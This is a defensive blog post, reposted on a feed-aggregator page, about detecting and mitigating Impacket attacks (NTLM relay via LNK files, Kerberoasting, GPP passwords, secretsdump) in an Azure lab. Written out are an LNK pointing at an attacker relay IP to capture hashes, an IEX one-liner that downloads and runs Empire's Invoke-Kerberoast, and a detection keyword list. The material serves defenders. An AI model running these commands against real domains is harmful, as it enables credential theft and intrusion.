惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

G
Google Developers Blog
Google DeepMind News
Google DeepMind News
Hugging Face - Blog
Hugging Face - Blog
D
Docker
F
Fortinet All Blogs
博客园 - 三生石上(FineUI控件)
Project Zero
Project Zero
Engineering at Meta
Engineering at Meta
J
Java Code Geeks
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
Simon Willison's Weblog
Simon Willison's Weblog
S
Security Affairs
NISL@THU
NISL@THU
T
Tor Project blog
A
About on SuperTechFans
宝玉的分享
宝玉的分享
腾讯CDC
S
Schneier on Security
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
P
Privacy & Cybersecurity Law Blog
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Stack Overflow Blog
Stack Overflow Blog
P
Privacy International News Feed
雷峰网
雷峰网
C
Cyber Attacks, Cyber Crime and Cyber Security
Vercel News
Vercel News
Cisco Talos Blog
Cisco Talos Blog
D
DataBreaches.Net
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
Google Online Security Blog
Google Online Security Blog
Recorded Future
Recorded Future
L
LINUX DO - 热门话题
Microsoft Security Blog
Microsoft Security Blog
Latest news
Latest news
C
Check Point Blog
有赞技术团队
有赞技术团队
T
The Exploit Database - CXSecurity.com
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
云风的 BLOG
云风的 BLOG
SecWiki News
SecWiki News
Application and Cybersecurity Blog
Application and Cybersecurity Blog
爱范儿
爱范儿
月光博客
月光博客
V
Vulnerabilities – Threatpost
T
Threat Research - Cisco Blogs
P
Palo Alto Networks Blog
T
The Blog of Author Tim Ferriss
C
Cisco Blogs
Webroot Blog
Webroot Blog
S
Security @ Cisco Blogs

Black Hills Information Security, Inc.

Bad Habits: An ANTISOC Operation Same Problem, Different Angles: When Red Team and Blue Team Actually Talk to Each Other How to Identify and Exploit New Vulnerabilities Swapper – A Pure Regex Match/Replace Burp Extension A Practical Guide to BloodHound Data Collection Network Engineering Basics Signed, Trusted, and Abused: Proxy Execution via WebView2 Getting Started In Pentesting – Advice From The BHIS Pentest Lead Cloud Security: Tips and Resources for Securing the Cloud Lessons From A Chatbot Incident How to Lead Effective Tabletops Understanding GRC: How to Navigate Risks and Compliance Standards The “P” in PAM is for Persistence: Linux Persistence Technique Malware Analysis: How to Analyze and Understand Malware OSINT: How to Find, Use, and Control Open-Source Intelligence What to Do with Your First Home Lab When the SOC Goes to Deadwood: A Night to Remember Social Engineering and Microsoft SSPR: The Road to Pwnage is Paved with Good Intentions Common Cyber Threats Finding the Right Penetration Testing Company Deceptive-Auditing: An Active Directory Honeypots Tool The Curious Case of the Comburglar How to Set Smart Goals (That Actually Work For You) Inside the BHIS SOC: A Conversation with Hayden Covington Abusing Delegation with Impacket (Part 3): Resource-Based Constrained Delegation Why You Got Hacked – 2025 Super Edition Abusing Delegation with Impacket (Part 2): Constrained Delegation Abusing Delegation with Impacket (Part 1): Unconstrained Delegation GoSpoof – Turning Attacks into Intel Model Context Protocol (MCP) Bypassing WAFs Using Oversized Requests Getting Started with AI Hacking Part 2: Prompt Injection Wrangling Windows Event Logs with Hayabusa & SOF-ELK (Part 2) DomCat: A Domain Categorization Tool Wrangling Windows Event Logs with Hayabusa & SOF-ELK (Part 1) Microsoft Store and WinGet: Security Risks for Corporate Environments Default Web Content MailFail Commonly Abused Administrative Utilities: A Hidden Risk to Enterprise Security Stop Spoofing Yourself! Disabling M365 Direct Send Bypassing CSP with JSONP: Introducing JSONPeek and CSP B Gone Offensive Tooling Cheatsheets: An Infosec Survival Guide Resource DNS Triage Cheatsheet GraphRunner Cheatsheet Burp Suite Cheatsheet Impacket Cheatsheet Wireshark Cheatsheet Hashcat Cheatsheet EyeWitness Cheatsheet Nmap Cheatsheet Netcat (nc) Cheatsheet Hunt for Weak Spots in Your Wireless Network with Airodump-ng from the Aircrack-ng Suite Detecting ADCS Privilege Escalation Vulnerability Scanning with Nmap Getting Started with NetExec: Streamlining Network Discovery and Access How to Use Dirsearch Augmenting Penetration Testing Methodology with Artificial Intelligence – Part 3: Arcanum Cyber Security Bot How to Design and Execute Effective Social Engineering Attacks by Phone Abusing S4U2Self for Active Directory Pivoting Why Use a Macro Pad? Espanso: Text Replacement, the Easy Way Caging Copilot: Lessons Learned in LLM Security Augmenting Penetration Testing Methodology with Artificial Intelligence – Part 2: Copilot Augmenting Penetration Testing Methodology with Artificial Intelligence – Part 1: Burpference Intercepting Traffic for Mobile Applications that Bypass the System Proxy How to Root Android Phones Communicating Security to the C-Suite: A Strategic Approach Offline Memory Forensics With Volatility Getting Started with AI Hacking: Part 1 Go-Spoof: A Tool for Cyber Deception How to Test Adversary-in-the-Middle Without Hacking Tools Canary in the Code: Alert()-ing on XSS Exploits How to Hack Wi-Fi with No Wi-Fi Why Your Org Needs a Penetration Test Program Burp Suite Extension: Copy For Light at the End of the Dark Web Wi-Fi Forge: Practice Wi-Fi Security Without Hardware Avoiding Dirty RAGs: Retrieval-Augmented Generation with Ollama and LangChain Gone Phishing: Installing GoPhish and Creating a Campaign 5 Things We Are Going to Continue to Ignore in 2025 John Strand’s 5 Phase Plan For Starting in Computer Security Questions From a Beginner Threat Hunter GRC for Security Managers: From Checklists to Influence AI Large Language Models and Supervised Fine Tuning Attack Tactics 9: Shadow Creds for PrivEsc w/ Kent & Jordan One Active Directory Account Can Be Your Best Early Warning Introduction to Zeek Log Analysis Indecent Exposure: Your Secrets are Showing Creating Burp Extensions: A Beginner’s Guide Pitting AI Against AI: Using PyRIT to Assess Large Language Models (LLMs) The Top Ten List of Why You Got Hacked This Year (2023/2024) ICS Hard Knocks: Mitigations to Scenarios Found in ICS/OT Backdoors & Breaches Intro to Data Analytics Using SQL Finding Access Control Vulnerabilities with Autorize The Detection Engineering Process Cyber Risk Lessons We Can Learn From Hurricane Preparedness Intro to Desktop Application Testing Methodology What Is Penetration Testing? Adversary in the Middle (AitM): Post-Exploitation Pentesting, Threat Hunting, and SOC: An Overview
Impacket Defense Basics With an Azure Lab
Kassie Kimball · 2022-07-27 · via Black Hills Information Security, Inc.

Jordan Drysdale //

Overview

The following description of some of Impacket’s tools and techniques is a tribute to the authors, SecureAuthCorp, and the open-source effort to maintain and extend the code. This is a follow-up to my “Impacket Offense Basics With an Azure Lab” article, and is going to take the other perspective of trying to detect and defend against these techniques.  

https://github.com/SecureAuthCorp/impacket 

Lab Setup

ARM template here: doazlab.com or github.com/DefensiveOrigins/DO-LAB  

Authenticate to an Azure subscription where you can construct resources. Deploy lab. 

  • Domain controller and joined workstation 
  • Ubuntu 

Preventative Deception 

This section will provide some basic commands for creating a couple of controlled objects in Active Directory. These objects will help us detect a few common attacks later.  

The Deploy-Deception toolkit deserves some credit, and while the repo is a few years old, the material is still relevant. Some of the most basic detections, like object attribute reads by an attacker against controlled objects (or Kerberoasting them), can reduce our mean time to detection. 

GitHub: https://github.com/samratashok/Deploy-Deception 

Blog: https://www.labofapenetrationtester.com/2018/10/deploy-deception.html  

The Luis account below is being created to facilitate some enumeration-type and Kerberoasting detections later.  

New-ADUser -UserPrincipalName [email protected] -Path "OU=DomainUsers,dc=doazlab,DC=com" -GivenName "Luis" -Surname "Graves" -Enabled 1 -Name "Luis.Graves" -desc "Accounting Controller" -office "Accounting" -title "Controller" -company "DevLabs" -AccountPassword (ConvertTo-SecureString "Password1!" -AsPlainText -Force) -Credential $Cred 

The account should have landed in the DomainUsers OU under the root of the domain.  

This account will be useful later, I promise.  

Ntlmrelayx.py

Defending against expansive toolkits like ntlmrelayx can be a challenge. You thought the Impacket libraries were extensive? There’s like 300 different combinations of attack options for just ntlmrelayx.

The defense scenario below attempts to mitigate Mitre ATT&CK 1204: Malicious Link. The LNK attack basically relies on a listening relay that is targeted by the LNK shortcut file.

https://attack.mitre.org/techniques/T1204/001/

So, in my opinion and at the time of writing (July 16, 2022), the mitigations outlined under the MITRE ATT&CK framework are insufficient to protect a domain’s file shares from the LNK and URL attack vector.

Network intrusion prevention comes up short under the following assumptions. 

  1. The adversary is trying to escalate privileges but is already working under a domain user’s compromised context.  
  1. Leaving an LNK or URL artifact on a file will likely go undetected without Microsoft’s File Server Resource Manager1 or similar technology. 
  1. The mission of an adversarial LNK file is not to download but instead to trigger silent authentication to the adversary relay.  

Anyway, I am failing to connect the dots with this mitigation and reality on the ground.  

Mitigation ID M1021, Restrict Web-Based Content, also suffers from the same reality that once an end user is compromised, their file shares become a soft target. As a pentester, I am not looking for web access, web services, or anything related to TCP/80 or TCP/443 after landing on a domain joined system. File shares == web protocols?!? Strange. 

Finally, the M1017 recommendation to train users is misplaced. A user browsing a file share interacts with the LNK file silently. Looking at an LNK’s target path in the command below, we can see it is pointed at an IP address elsewhere. 

PS C:\> $lnk = $objShell.CreateShortcut("c:\file6\malicious.lnk") 

PS C:\> $lnk.TargetPath = "\\10.0.0.8\@threat.png" 

Thus, if there is a training target here, it is all of IT operations on the nature of these files. Repeating – browsing a file share with the above LNK file will trigger silent Windows domain credential submission to the attacker (password hash). If a DA browses this share, the DA creds are submitted to the attacker’s relay. An end user browses the share, their domain credential material is sent to the attacker. There is nothing to teach the end user here… unless I am missing something.  

Detect?  

You could just detect and alarm on the file creation event using Sysmon. It really is just as easy as creating a match against .URL and .LNK files – BOOM – easy win (oh yeah, this gets caught by default using the legendary Olaf’s Sysmon-Modular).2 No Sysmon? Check your EDR and its capabilities. Windows event ID 4656 could drown your organization in log volume, so from an advice perspective, it would be difficult to enable “Audit Object Access” efficiently. 

Defense?  

This was made simple by Microsoft with FSRM. This allows a share administrator to limit the file extensions allowed. That simple? Yeah. You should try it sometime; it works.  

You can make this even easier by narrowing the focus of your file shares. If your domain lacks a cohesive workstation firewall policy, you probably have file shares you do not know about. Workstation firewalls will reduce the open share footprint on your network, reduce openings for adversaries using SMB RPC3 to facilitate additional attacks, and is another better security practice that can reduce risk. 

One more thing – know your egress exposure and check it often. You should reduce your outbound port exposures to avoid hashes getting shipped to an adversary outside your networks.  

The next defense scenario attempts to mitigate Mitre ATT&CK T1557: Adversary in the Middle. 

https://attack.mitre.org/techniques/T1557/001/

From the LNK attack perspective, the adversary in the middle is parked somewhere on your network or domain as a relay. When an end user browses the LNK’d share, their creds are sent to the adversary in the middle (AiTM) who forwards the creds along to whatever target makes sense in context.  

LLMNR and NBNS poisoning is a different animal and has been described in such exhausting detail over the years4 that it is shocking these protocols have not been patched out by Microsoft (maybe they have). Anyway, the Windows computer fails to identify a valid name to IP map and chooses to spew broadcast and multicast traffic all over the subnet… Our AiTM hears, responds, receives creds, profits $$$.  

This next defense technique is intended to match against an older version of the Mitre ATT&CK technique T1136: Add a Domain Account.  

https://attack.mitre.org/techniques/T1136/002/

Mitigations?  

These are basically moot when going up against NTLM relay via malicious URL, LNK, or LLMNR. The adversary is already in the post-exploitation phase of this attack.  

MFA? Not likely going to help against an LDAP DCE RPC5 attack. Network segmentation? Are you planning to allow end users and computers to authenticate against the domain? I thought so, thus you cannot segment off LDAP…strange mitigation. Patch your DCs! /obvs, but LDAPs and channel binding is what you really want here. Finally, PAM. Yay! Yeah, do this too. Keep your domain admins from interacting with anything except the domain controller and only under controlled conditions. 

Detections? 

Both command and PowerShell transcription are required these days. You will not survive a pentest without knowing what is going on across your infrastructure’s terminals. Catch net commands! Catch IEX, invoke, bypass, github, and a bunch of other dangerous terms that you might see in CLI log events. 

Windows event ID 47206 and 4722 should be monitored closely. These will describe account creation events.  

Defense?  

Check your ms-ds-machine-account-quota attribute in Active Directory. If this value is at default, it means that any domain user can add up to 10 computers to the domain. This value should be zero and the activity should be controlled by appropriately delegated systems administrators.  

GetADUsers.py 

Domain enumeration is common enough, adversarial activity, IT operations, pentests, that having a decoy account to notify the team is worth the time to deploy, alert, and monitor. Better to know someone ran SharpHound, ADExplorer, or GetADUsers.py than exist in the blind state way too many organizations are operating under. 

So, this defense technique could be referenced in MITRE ATT&CK as T1087, Account Discovery: Domain Account. This is basic enumeration in the attack technique matrix. 

https://attack.mitre.org/techniques/T1087/002/

Let’s run the deception tool mentioned earlier and add an account that we will specifically monitor and alert against any time the user’s attributes are enumerated. 

iwr -URI https://github.com/DefensiveOrigins/Deploy-Deception/archive/refs/heads/master.zip -outfile deception.zip 
expand-archive deception.zip  
rm deception.zip  
mv .\deception\Deploy-Deception-master\* .\deception\  
cd deception  
Set-ExecutionPolicy bypass -Force  
Import-Module .\Deploy-Deception.ps1 
Create-DecoyUser -UserFirstName DOLabs -UserLastName AnyRead -Password Password1! 
Deploy-UserDeception -UserFlag PasswordNeverExpires –Verbose

The next piece of this detect and alert puzzle requires that we gather the ObjectGUID from the object’s AD attributes. 

Get-ADUser -Identity DOLabsAnyRead -Properties "ObjectGuid" 

Once you have the GUID, build your detection logic where the Windows event ID is 4662 and the GUID we gathered from our decoy. 

Run BloodHound, ADExplorer, GetADUsers, whatever enumeration tool fuels your engine. In Sentinel, I get a detection.  

Get-GPPPassword.py 

This attack maps against MITRE ATT&CK, a sub-technique under T1552, Unsecured Credentials: Group Policy Preferences.  

https://attack.mitre.org/techniques/T1552/006/ 

The recommended mitigations here align with reality. 

Defense? Detection? 

You should catch this activity if it is performed via CLI or PS. If any terms in your transcription logs align with cpassword, file an incident and get investigating.  

GetUserSPNs.py 

The GetUserSPNs.py class was designed to gather Kerberos ticket hashes from a domain. This attack is classified as a sub-technique of MITRE ATT&CK T1558, Steal or Forge Kerberos Tickets.  

https://attack.mitre.org/techniques/T1558/003/ 

This one is great! Let’s add an SPN to Luis’ account which we created earlier and use that account to detect kerberoasting. 

setspn -a ws05/luis.graves.doazlab.com:1433 doazlab.com\luis.graves 

Roast ‘em! 

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat john 

The ticket byte hex stream was chopped for brevity. 

We did catch this activity. This is an IoC. This was an easy win. Create and alert on this type of activity. 

Defense? 

Seriously strong passwords. I am not talking about long organization-related scrapable or dictionary type passwords. I am talking 25 characters or more, multiple words, or randomized and PAM managed passwords. 

Managed service accounts. Standalone MSAs are easy to deploy. Group MSAs (gMSAs) are a bit more challenging but are designed for clustered systems like database servers.  

Secretsdump.py 

This attack aligns with MITRE ATT&CK T1003, OS Credential Dumping. 

https://attack.mitre.org/techniques/T1003/003/ 

Mitigations? These mitigation IDs are great advice. Read the section on MITRE.  

Detections?  

What about the RemoteRegistry service? Most of the tools that interact with LSA and attempt to capture the SAM table use an SMB remote process/procedure call to start this service. Once the service is started, additional operations are performed using it. I almost forgot to include this detection, thus the old screenshot below. However, you should treat Windows event ID 4688 with invocations to start the RemoteRegistry service as worthy of investigation. 

The second Secretsdump.py invocation is the NTDS.dit capture. This has the same parent technique, T1003, OS Credential Dumping, but is a different sub-technique. In this case, the MITRE sub-technique is listed as DCSync.  

https://attack.mitre.org/techniques/T1003/006/ 

Detections?  

All DCsync operations performed by a non-DC should be scrutinized like the organization’s intellectual property depended on it. This should raise flags across IT operations. All hands on deck! 

Defenses?  

Secretsdump can be limited with workstation and server firewalls. Often, the intermediate jump to DA has 445 open, which allows SMB RPC access to LSASS. This access allows the compromise of an admin and may open additional paths across a network.

Thanks for reading. 

-jd 

References

1. https://docs.microsoft.com/en-us/windows-server/storage/fsrm/fsrm-overview

2. https://github.com/olafhartong/sysmon-modular

3. https://www.thehacker.recipes/ad/recon/ms-rpc 

4. https://www.blackhillsinfosec.com/how-to-disable-llmnr-why-you-want-to/

5. https://ldapwiki.com/wiki/DCE-RPC 

6. https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4720

Want to learn more mad skills from the person who wrote this blog?

Check out these classes from Jordan and Kent: